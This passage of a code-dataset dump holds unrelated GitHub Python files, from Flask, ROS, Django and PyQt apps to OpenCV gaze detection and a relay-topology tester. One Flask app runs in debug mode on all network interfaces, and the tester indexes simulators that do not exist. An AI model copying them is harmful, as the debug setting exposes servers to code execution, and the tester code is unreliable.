'TOBACCO',TOBACCO)\n","repo_name":"grace-mengke-hu/TRIANGULUM","sub_path":"Annotation/TagAndRelationshipCount.py","file_name":"TagAndRelationshipCount.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35973739905","text":"# Initialization\nfrom time import sleep\nfrom NaoCommunication import *\nnao=NaoControle(Nao())\n\n# 1 - Describe the result of this piece of code\n# ...\nfor a in range(16):\n\tif a%2==0:\n\t\tnao.reglerCouleur(a,a*15,50,50) \n\telse:\n\t\tnao.reglerCouleur(a,255,0,0)\n\tsleep(0.1)\nfor a in range(15,-1,-1):\n\tnao.eteindreLed(a)\n\tsleep(0.1)\n\n# 2 - Describe the result of this second piece of code\n# ...\nfor a in range(15,-1,-1):\n\tnao.allumerLed(a)\n\tsleep(0.1)\nfor a in range(0,16,1):\n\tnao.eteindreLed(a)\n\tsleep(0.1)\n\n# 3 - Building on the previous examples, write code that lights\n# the two LEDs alternately, one second each, for 10 seconds.\n\n","repo_name":"AdrienVR/NaoSimulator","sub_path":"TPINFO/Partie3/exercice1.py","file_name":"exercice1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20910708219","text":"from flask import Flask, render_template, jsonify\nfrom database import get_jobs\n\napp = Flask(__name__)\n\n# jobs = [\n#     {\n#         'id': 1,\n#         'title': 'Data Analyst',\n#         'location': 'Kuala Lumpur',\n#         'salary': 'RM4000 - 5000'\n#     },\n#     {\n#         'id': 2,\n#         'title': 'Software Engineer',\n#         'location': 'Penang',\n#         'salary': 'RM6000 - 8000'\n#     },\n#     {\n#         'id': 3,\n#         'title': 'Marketing Manager',\n#         'location': 'Johor Bahru',\n#     }\n# 
]\n\n\n@app.route(\"/\")\ndef home():\n jobs = get_jobs()\n return render_template(\"home.html\", jobs=jobs)\n\n\n@app.route(\"/api/jobs\")\ndef job_list():\n jobs = get_jobs()\n return jsonify(jobs)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", debug=True)\n\n","repo_name":"jianhui99/jd_job","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16176351167","text":" \nimport socket\nimport rospy\nfrom monitoring_msgs.msg import *\nfrom enum import Enum\n\nclass AggregationStrategies(Enum):\n LAST = 1\n FIRST = 2\n MIN = 3\n MAX = 4\n AVG = 5\n\nclass Monitor(object):\n def __init__(self, monitorDescription, autoPublishing=True):\n self.ma = MonitoringArray()\n self.description = monitorDescription\n self.host_name = socket.gethostname()\n self.node_name = rospy.get_name()\n self.name = self.host_name + self.node_name\n self.is_initialised = False\n self.autoPublishing = autoPublishing\n self.pub_count = 1\n self.reset_agg_dict = False\n self.aggregation_dict = {}\n self.aggregation_dict[self.name] = {}\n self.switcher = {\n AggregationStrategies.LAST: 1,\n AggregationStrategies.FIRST: 2,\n AggregationStrategies.MIN: 3,\n AggregationStrategies.MAX: 4,\n AggregationStrategies.AVG: 5,\n }\n\n\n def init_ros(self):\n self.pub = rospy.Publisher('/monitoring', MonitoringArray, queue_size=1)\n\n if self.autoPublishing:\n try:\n frequency = 1\n frequency = rospy.get_param(rospy.get_name() + '/monitoring/frequency', 1)\n if frequency == 0:\n rospy.logerr(\"frequency can not be 0, using 1\")\n frequency = 1\n duration = 1.0/frequency\n self.timer = rospy.Timer(rospy.Duration(duration), self.timercallback)\n except KeyError:\n rospy.logerr(\"monitoring frequency not set (%s/monitoring/frequency)\", rospy.get_name())\n quit()\n\n self.is_initialised = True\n\n\n def timercallback(self, event):\n self.publish()\n\n\n def agg_to_int(self, agg):\n return self.switcher.get(agg, None)\n\n\n def int_to_agg(self, ival):\n for key in self.switcher.keys():\n if ival == self.switcher[key]:\n return key\n return None\n\n\n def addValue(self, key, value, unit, errorlevel, monitor_mode=AggregationStrategies.LAST):\n # preparation \n if not self.is_initialised:\n self.init_ros()\n if self.reset_agg_dict:\n self.aggregation_dict[self.name] = {}\n self.reset_agg_dict = False\n # sanity checks\n if type(monitor_mode) == int:\n monitor_mode = self.int_to_agg(monitor_mode)\n elif type(monitor_mode) == float:\n monitor_mode = self.int_to_agg(int(monitor_mode))\n if \" \" in key:\n rospy.logwarn(\"[%s] whitespaces are not allowed in monitoring keys!\", self.node_name)\n # data aggregation\n if key in self.aggregation_dict[self.name]:\n mode = self.aggregation_dict[self.name][key]['Mode']\n if mode in (5, 4, 3) and type(value) != float:\n if type(value) != int:\n rospy.logwarn(\"With the current Aggregation Strategy for key: \"+key+\" your value has wrong type: \"+str(type(value)))\n rospy.logwarn(\"It has to be a numerical value in order to function. 
Doing nothing\")\n return \n if mode == 5:\n self.aggregation_dict[self.name][key]['Num'] += 1\n self.aggregation_dict[self.name][key]['Sum'] += value\n self.aggregation_dict[self.name][key]['Error'] += errorlevel\n elif mode == 4:\n if value > self.aggregation_dict[self.name][key]['Value']:\n self.aggregation_dict[self.name][key]['Value'] = value\n self.aggregation_dict[self.name][key]['Error'] = errorlevel\n elif mode == 3:\n if value < self.aggregation_dict[self.name][key]['Value']:\n self.aggregation_dict[self.name][key]['Value'] = value\n self.aggregation_dict[self.name][key]['Error'] = errorlevel\n elif mode == 1:\n self.aggregation_dict[self.name][key]['Value'] = value\n self.aggregation_dict[self.name][key]['Error'] = errorlevel\n else:\n self.aggregation_dict[self.name][key] = {'Num' : 1 , 'Value' : value, 'Sum' : value, 'Mode' : self.agg_to_int(monitor_mode), 'Unit': str(unit), 'Error': errorlevel}\n\n\n def publish(self):\n self.ma.header.stamp = rospy.Time.now()\n self.write_data()\n self.pub.publish(self.ma)\n self.resetMsg()\n self.pub_times = 1\n\n\n def write_data(self):\n mi = MonitoringInfo()\n mi.name = self.name\n mi.description = self.description\n mi.header.stamp = rospy.Time.now()\n self.ma.info.append(mi)\n for key in self.aggregation_dict[self.name].keys():\n kv = KeyValue()\n data = self.aggregation_dict[self.name][key]\n if data['Mode'] == 5:\n kv.key = str(key)\n kv.value = str(data['Sum']/(data['Num'] + 0.00001))\n kv.unit = data['Unit']\n kv.errorlevel = float(data['Error']/(data['Num']+0.0001))\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 2:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 3:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 4:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n elif data['Mode'] == 1:\n kv.key = str(key)\n kv.value = str(data['Value'])\n kv.unit = data['Unit']\n kv.errorlevel = data['Error']\n self.ma.info[0].values.append(kv)\n else:\n rospy.logerr(\"Key: \"+str(key)+\" has unknown Aggregation Strategy:\" +str(data['Mode']))\n \n\n def resetMsg(self):\n self.ma = MonitoringArray()\n self.reset_agg_dict = True\n\n\n","repo_name":"rajmohan747/Robot-Diagnostics","sub_path":"monitoring/monitoring_core/scripts/monitoring_core/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38806439024","text":"from flask import Flask, render_template, url_for, request\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score, plot_confusion_matrix, log_loss\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nfrom model import final_model\nimport pickle\n\nimage_folder = os.path.join('static', 'images')\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = image_folder\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n\n 
court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n return render_template(\"nba.html\", user_image = court)\n\n@app.route('/age', methods=['POST', 'GET'])\ndef get_more_data():\n \n court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n\n if request.method == 'POST':\n year_choice = request.form['year-form']\n\n return render_template(\"nba2.html\", year_choice=year_choice, user_image = court)\n\n@app.route('/teams', methods=['POST', 'GET'])\ndef get_even_more_data():\n \n court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n\n if request.method == 'POST':\n parameters = request.form['age-form']\n year_choice = parameters.split(\", \")[1]\n max_age = parameters.split(\", \")[0]\n\n return render_template(\"nba3.html\", year_choice=year_choice, max_age=max_age, user_image = court)\n\n@app.route('/predict', methods=['POST', 'GET'])\ndef predict():\n \n court = os.path.join(app.config['UPLOAD_FOLDER'], 'Court 1 smaller.png')\n player_circle = os.path.join(app.config['UPLOAD_FOLDER'], 'Circle.png')\n\n updated_df = os.path.join(app.config['UPLOAD_FOLDER'], 'updated_df.pickle')\n model = os.path.join(app.config['UPLOAD_FOLDER'], 'model.pickle')\n ss = os.path.join(app.config['UPLOAD_FOLDER'], 'scaler.pickle')\n\n if request.method == 'POST':\n parameters = request.form['team-form']\n year_choice = parameters.split(\", \")[2]\n max_age = parameters.split(\", \")[1]\n if max_age == \"all\":\n max_age = 50\n teams = parameters.split(\", \")[0]\n\n df = pickle.load(open(updated_df, \"rb\"))\n MODEL = pickle.load(open(model, \"rb\"))\n scaler = pickle.load(open(ss, \"rb\"))\n\n top_24 = final_model(MODEL, scaler, df, int(f'20{year_choice[-2:]}'), \\\n max_age=int(max_age), teams=teams, first_timers_only=False)\n\n return render_template(\"nba_results.html\", user_image=court, circle=player_circle, all_stars=top_24)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"ian-livingston/projecting-NBA-All-Stars","sub_path":"Flask app/nba.py","file_name":"nba.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25078214931","text":"import os, json\nfrom metaflow.cards import MetaflowCard\n\nCOLORS = [\n '#7e1e9c',\n '#15b01a',\n '#0343df',\n '#ff81c0',\n '#653700',\n '#e50000'\n]\n\nclass UPlotTimeseriesCard(MetaflowCard):\n type = \"uplot\"\n \n def __init__(self, options={\"artifact\":\"timeseries\"}, **kwargs):\n self._attr_nm = options.get(\"artifact\", \"timeseries\")\n\n\n def _read_template(self):\n root = os.path.join(os.path.dirname(__file__), 'uplot')\n tmpl = {}\n for key, fname in [('card', 'card.html'),\n ('uplot', 'uPlot.iife.min.js'),\n ('css', 'uPlot.min.css')]: \n with open(os.path.join(root, fname)) as f:\n tmpl[key] = f.read()\n return tmpl\n\n def render(self, task):\n if self._attr_nm not in task:\n return \"Cannot find artifact '%s' in Task('%s')\" % (self._attr_nm,task.pathspec)\n\n chevron = self._get_mustache()\n tmpl = self._read_template()\n df = task[self._attr_nm].data\n data = [[ts.timestamp() for ts in df.index]]\n for col in df:\n data.append(list(df[col].values))\n config = [{}] + [\n {'show': True,\n 'stroke': COLORS[i],\n 'label': col,\n 'width': 1} for i, col in enumerate(df)]\n tmpl['data'] = json.dumps(data)\n tmpl['config'] = json.dumps(config)\n return chevron.render(tmpl['card'], tmpl)\n\nCARDS = 
[UPlotTimeseriesCard]","repo_name":"outerbounds/metaflow-card-uplot","sub_path":"metaflow_extensions/card_uplot/plugins/cards/uplot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41642247614","text":"from Bandeirinha import Bandeirinha\n\nclass BandeirinhaQuadrado(Bandeirinha):\n def __init__(self, px, py, ptamanho=None):\n super(BandeirinhaQuadrado, self).__init__(px, py, ptamanho)\n self.cor_quadrado = color(random(256),\n random(256),\n random(256)) \n \n def desenha(self):\n super(BandeirinhaQuadrado, self).desenha()\n fill(self.cor_quadrado)\n rect(self.x - self.tamanho / 8,\n self.y - self.tamanho / 8,\n self.tamanho / 4,\n self.tamanho / 4)\n ","repo_name":"villares/py.processing-play","sub_path":"inheritance/BandeirinhaQuadrado.py","file_name":"BandeirinhaQuadrado.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"pt","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"71016116646","text":"# fuel consumption converter\n\ndef l100kmtompg(liters):\n lpkm = liters/100\n gpm = lpkm * 0.4248\n mpg = 1/gpm\n \n return mpg\n \ndef mpgtol100km(miles):\n gpm = 1/miles\n lpkm = gpm * 2.351\n l100km = lpkm * 100\n \n return l100km\n\nprint(l100kmtompg(3.9))\nprint(l100kmtompg(7.5))\nprint(l100kmtompg(10.))\nprint(mpgtol100km(60.3))\nprint(mpgtol100km(31.4))\nprint(mpgtol100km(23.5))\n","repo_name":"lembuss/My-Python-Codes","sub_path":"fuelcons_converter.py","file_name":"fuelcons_converter.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26557459290","text":"import cv2\nimport numpy as np \n\nxy=[]\ni=0\n\ndef rect(event,x,y,flags,param):\n\tglobal xy,i\n\tif event==cv2.EVENT_LBUTTONDOWN:\n\t\tfont=cv2.FONT_HERSHEY_SIMPLEX\n\t\tcv2.putText(img,str([x,y]),(x,y),font,0.75,(0,255,0),1,cv2.LINE_AA)\n\t\tcv2.imshow(\"image\",img)\n\t\ti=i+1\n\t\txy.append((x,y))\n\t\tif i==2:\n\t\t\ti=0\n\t\t\tcv2.rectangle(img,xy[0],xy[1],[0,0,255],5)\n\t\t\tcv2.imshow(\"image\",img)\n\t\t\txy=[]\n\t\t\t\t\t\n\t\t\n\n\nimg=cv2.imread(\"c:/users/girishhegde/iitdimg/dog2.jpg\")\ncv2.imshow(\"image\",img)\n\ncv2.setMouseCallback('image',rect)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"girishdhegde/aps-2020","sub_path":"roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16785832542","text":"import random\nfrom pprint import pprint\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tqdm import tqdm\n\nfrom pursue_central_solution.PursueCentralSolution import PursueCentralSolution\nfrom pursue_central_solution.PursueCentralSmarter import PursueCentralSmarterSolution\nfrom greedy_central_solution.GreedyCentralSolution import GreedyCentralSolution\n\nfrom decentralized_solution.DecentralizedNode import DecentralizedSolution\nfrom decentralized_solution.DecentralizedNode import DecentralizedNode\n\nfrom simulation.node import Node, Pos\nfrom simulation.node.Node import NodeType\n\nMAX_NODE_COUNT = 5\nAVERAGE_SAMPLES = 10\nUNIT_DISTANCE = 40\nVELOCITY = 5\n\n\ndef area_shoelace(points):\n area = 0\n q = points[-1]\n for p in points:\n area += (p.position.x * q.position.y) - (p.position.y * q.position.x)\n q = p\n return area / 2\n\n\ndef total_distance_from_gateway(points : 
list[DecentralizedNode]):\n    gateway = points[0]\n    dist = 0\n    for x in points[1:]:\n        dist += gateway.distance_to(x)\n    return dist\n\ndef avg_link_length(points: list[DecentralizedNode]):\n    # points is the full node list; average the gateway-path length over the end nodes\n    link_acc = 0\n    end_count = 0\n    for x in points:\n        if x.type == NodeType.End:\n            link_acc += traverse_distance(x, 0)\n            end_count += 1\n    return link_acc / end_count if end_count else 0\n\ndef traverse_distance(point:DecentralizedNode, in_d):\n    p = point.parent\n    dist = in_d + point.distance_to(p)\n    if p.type == NodeType.Home:\n        return dist\n    else:\n        return traverse_distance(p, dist)\n\ndef total_distance_calc(relay_points, nodes, unit_distance):\n    dist_ratio = len(relay_points)\n    dist_ratio += len(nodes)\n    return unit_distance * dist_ratio\n\n\nif __name__ == \"__main__\":\n    sample_size = [10,20,50]\n    node_range = [5,10,15,20,25,30]\n\n    for q in sample_size:\n        AVERAGE_SAMPLES = q\n\n        for w in node_range:\n            MAX_NODE_COUNT = w\n            nodes_list = []\n\n            a_node = Node(Pos(0, 0))\n            nodes_list.append(a_node)\n\n            combined_simulator = []\n\n            combined_simulator.append(DecentralizedSolution(UNIT_DISTANCE, nodes_list))\n\n            nodes_list.append(DecentralizedNode(combined_simulator[3].sandbox, UNIT_DISTANCE, in_node=Node(Pos(10, 10))))\n            combined_simulator[3].prepare()\n            average_list = [np.zeros(len(combined_simulator))]\n\n            for v in tqdm(range(MAX_NODE_COUNT)):\n                value_list = []\n                for _ in range(AVERAGE_SAMPLES):\n                    for x in nodes_list[1:]:\n                        x.position.velocity_add([random.randint(-VELOCITY, VELOCITY), random.randint(-VELOCITY, VELOCITY)])\n\n                    print_list = []\n                    for idx, x in enumerate(combined_simulator[:4]):\n                        if idx == 3:\n                            for _ in range(30):\n                                x.execute_pipeline()\n                            print_list.append(total_distance_calc(x.relay_list, nodes_list[1:], UNIT_DISTANCE))\n                        else:\n                            x.execute_pipeline()\n                            print_list.append(total_distance_calc(x.relay_list, nodes_list[1:], UNIT_DISTANCE))\n                        x.reset()\n                    value_list.append(print_list)\n                average_list.append(np.mean(value_list, axis=0))\n                # pprint(average_list)\n                tmp_node = DecentralizedNode(combined_simulator[3].sandbox, UNIT_DISTANCE, in_node=Node(Pos(0, 0)))\n                tmp_node.type = NodeType.End\n                tmp_node.parent = combined_simulator[3].relay_list[0]\n                nodes_list.append(tmp_node)\n\n            plt.plot(average_list)\n            plt.grid(True)\n            plt.legend([\"Simple Pursue Algorithm\", \"Improved Pursue Algorithm\", \"Greedy Algorithm\", \"Decentralized Algorithm\"])\n\n            base_filename = \"testdata/test_\" + str(AVERAGE_SAMPLES) + \"samples_\" + str(MAX_NODE_COUNT) + \"nodes\"\n\n            np.savetxt(base_filename+\".csv\", average_list, delimiter=\",\")\n            plt.savefig(base_filename+\".png\")\n            plt.clf()\n            # plt.show()\n","repo_name":"MMWa/Topology-Adjustment","sub_path":"tester_avg_link_length.py","file_name":"tester_avg_link_length.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20720140462","text":"from django_countries.serializer_fields import CountryField\nfrom django_countries.serializers import CountryFieldMixin\nfrom rest_framework import serializers\n\nfrom .models import Hotspot\nfrom apps.rewards.models import Reward\nfrom apps.rewards.serializers import RewardSerializer\n\n\nclass HotspotSerializer(CountryFieldMixin, serializers.ModelSerializer):\n    reward = RewardSerializer(many=True)\n    country = CountryField(name_only=True)\n\n    class Meta:\n        model = Hotspot\n        fields = [\n            'pkid',\n            'id',\n            'hotspot_name',\n            'hex_location',\n            'location_url',\n            'slug',\n            'hotspot_manager',\n            'homeowner_names',\n            'street_address',\n            'city',\n            'postal_code',\n            'state_or_province',\n            
'country',\n            'phone_number',\n            'general_notes',\n            'full_url',\n            'reward',\n        ]\n\n    def create(self, validated_data):\n        rewards_data = validated_data.pop('reward')\n        hotspot = Hotspot.objects.create(**validated_data)\n        for reward_data in rewards_data:\n            # assumes the Reward model has a ForeignKey back to Hotspot named `hotspot`\n            Reward.objects.create(hotspot=hotspot, **reward_data)\n        return hotspot\n\n\nclass HotspotCreateSerializer(CountryFieldMixin, serializers.ModelSerializer):\n    country = CountryField(name_only=True)\n\n    class Meta:\n        model = Hotspot\n        exclude = ['updated_at', ]  # this means TimeStampedUUIDModel is excluded\n","repo_name":"neyona/helium-reader","sub_path":"apps/hotspots/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7385525408","text":"import unittest\nimport pandas as pd\nimport datetime as dt\n\nfrom app.domain.services.portfolio.portfolio_service import PortfolioService\nfrom app.domain.services.strategy.mock_strategy_service import MockStrategyService\nfrom app.domain.model.portfolio.portfolio_type import PortfolioType\nfrom app.infrastructure.config import app_config\n\n\nclass TestPortfolioService(unittest.TestCase):\n    def setUp(self):\n        dates = ['2020-03-01', '2020-03-02', '2020-03-03']\n        dates = list(map(lambda x: dt.datetime.strptime(x, \"%Y-%m-%d\"), dates))\n        spot = [100, 105, 90]\n        open = [100, 105, 90]\n        high = [100, 105, 90]\n        low = [100, 105, 90]\n        close = [100, 105, 90]\n        vol = [100, 105, 90]\n        df = pd.DataFrame(list(zip(dates, spot, open, high, low, close, vol)),\n                          columns=[app_config.AS_OF_DATE, app_config.SPOT,\n                                   app_config.OPEN, app_config.HIGH,\n                                   app_config.LOW, app_config.CLOSE,\n                                   app_config.VOLATILITY])\n        df[app_config.TURNOVER] = 0\n        strat_service = MockStrategyService()\n        self.ptf_service = PortfolioService(asset_values=df,\n                                            initial_capital=1000,\n                                            ptf_type=PortfolioType.SHORT_ALLOWED,\n                                            strategy_service=strat_service)\n        print()\n\n    def tearDown(self):\n        pass\n\n    def test_evaluate_all(self):\n        self.ptf_service.evaluate_all()\n        ptf = self.ptf_service.portfolio[0]\n        self.assertEqual(1000, ptf.liquidative_value)\n        ptf = self.ptf_service.portfolio[1]\n        self.assertEqual(1005, ptf.liquidative_value)\n        ptf = self.ptf_service.portfolio[2]\n        self.assertEqual(975, ptf.liquidative_value)\n\n    def test_to_df(self):\n        df = self.ptf_service.ptf_to_df()\n\n\nif __name__ == '__main__':\n    unittest.main(verbosity=2)\n","repo_name":"robinleruth/commando-project","sub_path":"tests/test_portfolio_service.py","file_name":"test_portfolio_service.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14928804581","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom ui.changePassword import changePasswordDialog\n\n\nclass PersonCenter_window(object):\n    def setupUi(self, MainWindow):\n        MainWindow.setObjectName(\"MainWindow\")\n        MainWindow.resize(421, 411)\n        self.centralwidget = QtWidgets.QWidget(MainWindow)\n        self.centralwidget.setObjectName(\"centralwidget\")\n        self.photo = QtWidgets.QLabel(self.centralwidget)\n        self.photo.setGeometry(QtCore.QRect(120, 40, 151, 141))\n        self.photo.setAutoFillBackground(False)\n        self.photo.setText(\"\")\n        self.photo.setPixmap(QtGui.QPixmap(\"../img/xg.jpg\"))\n        self.photo.setScaledContents(True)\n        self.photo.setObjectName(\"photo\")\n        self.username = QtWidgets.QLabel(self.centralwidget)\n        self.username.setGeometry(QtCore.QRect(70, 220, 111, 41))\n        font = 
QtGui.QFont()\n font.setPointSize(16)\n self.username.setStyleSheet(\"font: 16pt; font: bold\")\n self.username.setObjectName(\"username\")\n self.secret = QtWidgets.QPushButton(self.centralwidget)\n self.secret.setGeometry(QtCore.QRect(150, 310, 121, 41))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.secret.setStyleSheet(\"font: 13pt\")\n self.secret.setObjectName(\"pushButton\")\n self.back = QtWidgets.QPushButton(self.centralwidget)\n self.back.setGeometry(QtCore.QRect(290, 310, 121, 41))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.back.setStyleSheet(\"font: 13pt\")\n self.back.setObjectName(\"pushButton_2\")\n self.setphoto = QtWidgets.QPushButton(self.centralwidget)\n self.setphoto.setGeometry(QtCore.QRect(10, 310, 121, 41))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.setphoto.setStyleSheet(\"font: 13pt\")\n self.setphoto.setObjectName(\"pushButton_3\")\n self.name = QtWidgets.QLabel(self.centralwidget)\n self.name.setGeometry(QtCore.QRect(180, 220, 231, 41))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.name.setStyleSheet(\"font: 16pt; font: bold\")\n self.name.setObjectName(\"name\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n # self.secret.clicked.connect(secretButtonClicked)\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"个人中心\"))\n self.username.setText(_translate(\"MainWindow\", \"用户名:\"))\n self.secret.setText(_translate(\"MainWindow\", \"修改密码\"))\n self.back.setText(_translate(\"MainWindow\", \"返回\"))\n self.setphoto.setText(_translate(\"MainWindow\", \"更换头像\"))\n\n","repo_name":"Cannhy/Pyqt5-UI-Design","sub_path":"ui/PersonCenter_window.py","file_name":"PersonCenter_window.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6746997506","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\n\ncap = cv2.VideoCapture(0)\n\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\n\ndef mid_point(p1, p2):\n return int((p1.x + p2.x) / 2), int((p1.y + p2.y) / 2)\n\n\ndef get_blinking_ratio(eye_points, facial_landmarks):\n left_point = (facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y)\n right_point = (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y)\n center_top = mid_point(facial_landmarks.part(eye_points[1]), facial_landmarks.part(eye_points[2]))\n center_bottom = mid_point(facial_landmarks.part(eye_points[5]), facial_landmarks.part(eye_points[4]))\n\n # hor_line = cv2.line(frame, left_point, right_point, (0, 255, 0), 2)\n # ver_line = cv2.line(frame, center_top, center_bottom, (0, 255, 0), 2)\n\n hor_line_length = hypot((left_point[0] - right_point[0]), (left_point[1] - right_point[1]))\n ver_line_length = hypot((center_top[0] - center_bottom[0]), (center_top[1] - center_bottom[1]))\n\n ratio = hor_line_length / ver_line_length\n return ratio\n\n\nfont = cv2.FONT_HERSHEY_PLAIN\n\n\ndef get_gaze_ratio(eye_points, facial_landmarks):\n # Gaze direction\n left_eye_region = np.array([(facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y),\n 
(facial_landmarks.part(eye_points[1]).x, facial_landmarks.part(eye_points[1]).y),\n                                (facial_landmarks.part(eye_points[2]).x, facial_landmarks.part(eye_points[2]).y),\n                                (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y),\n                                (facial_landmarks.part(eye_points[4]).x, facial_landmarks.part(eye_points[4]).y),\n                                (facial_landmarks.part(eye_points[5]).x, facial_landmarks.part(eye_points[5]).y)],\n                               np.int32)\n    # cv2.polylines(frame, [left_eye_region], True, (0, 0, 255), 2)\n\n    height, width, _ = frame.shape\n    mask = np.zeros((height, width), np.uint8)\n    cv2.polylines(mask, [left_eye_region], True, 255, 2)\n    cv2.fillPoly(mask, [left_eye_region], 255)\n    eye = cv2.bitwise_and(gray, gray, mask=mask)\n\n    min_x = np.min(left_eye_region[:, 0])\n    max_x = np.max(left_eye_region[:, 0])\n    min_y = np.min(left_eye_region[:, 1])\n    max_y = np.max(left_eye_region[:, 1])\n\n    gray_eye = eye[min_y: max_y, min_x: max_x]\n    # gray_eye = cv2.cvtColor(eye, cv2.COLOR_BGR2GRAY)\n    _, threshold_eye = cv2.threshold(gray_eye, 70, 255, cv2.THRESH_BINARY)\n    height, width = threshold_eye.shape\n    left_side_threshold = threshold_eye[0: height, 0: int(width / 2)]\n    left_side_white = cv2.countNonZero(left_side_threshold)\n\n    right_side_threshold = threshold_eye[0: height, int(width / 2): width]\n    right_side_white = cv2.countNonZero(right_side_threshold)\n\n    # note: rows are indexed from the top of the image, so upper_side here\n    # actually covers the bottom half of the eye (and lower_side the top half)\n    upper_side_threshold = threshold_eye[int(height / 2): height, 0: width]\n    upper_side_white = cv2.countNonZero(upper_side_threshold)\n\n    lower_side_threshold = threshold_eye[0: int(height / 2), 0: width]\n    lower_side_white = cv2.countNonZero(lower_side_threshold)\n\n    gaze_ratio_horizontal = left_side_white / (right_side_white + 0.00000001)\n    gaze_ratio_vertical = lower_side_white / (upper_side_white + 0.00000001)\n\n    return gaze_ratio_horizontal, gaze_ratio_vertical\n\n\nblinking_frames = 0\nwhile True:\n    _, frame = cap.read()\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    faces = detector(gray)\n    for face in faces:\n        x, y = face.left(), face.top()\n        x1, y1 = face.right(), face.bottom()\n        cv2.rectangle(frame, (x, y), (x1, y1), (0, 255, 0), 2)\n\n        landmarks = predictor(gray, face)\n\n        # Detect blinking\n        left_eye_ratio = get_blinking_ratio([36, 37, 38, 39, 40, 41], landmarks)\n        right_eye_ratio = get_blinking_ratio([42, 43, 44, 45, 46, 47], landmarks)\n        blinking_ratio = (left_eye_ratio + right_eye_ratio) / 2\n        if blinking_ratio > 4.4: # tune this threshold\n            cv2.putText(frame, \"BLINKING\", (50, 150), font, 4, (255, 0, 0))\n            blinking_frames += 1\n            if blinking_frames == 10:\n                cv2.putText(frame, \"Closed Eyes\", (50, 200), font, 4, (255, 0, 0))\n        else:\n            blinking_frames = 0\n\n        # Gaze detection\n        gaze_ratio_horizontal_left_eye, gaze_ratio_vertical_left_eye = get_gaze_ratio([36, 37, 38, 39, 40, 41],\n                                                                                      landmarks)\n        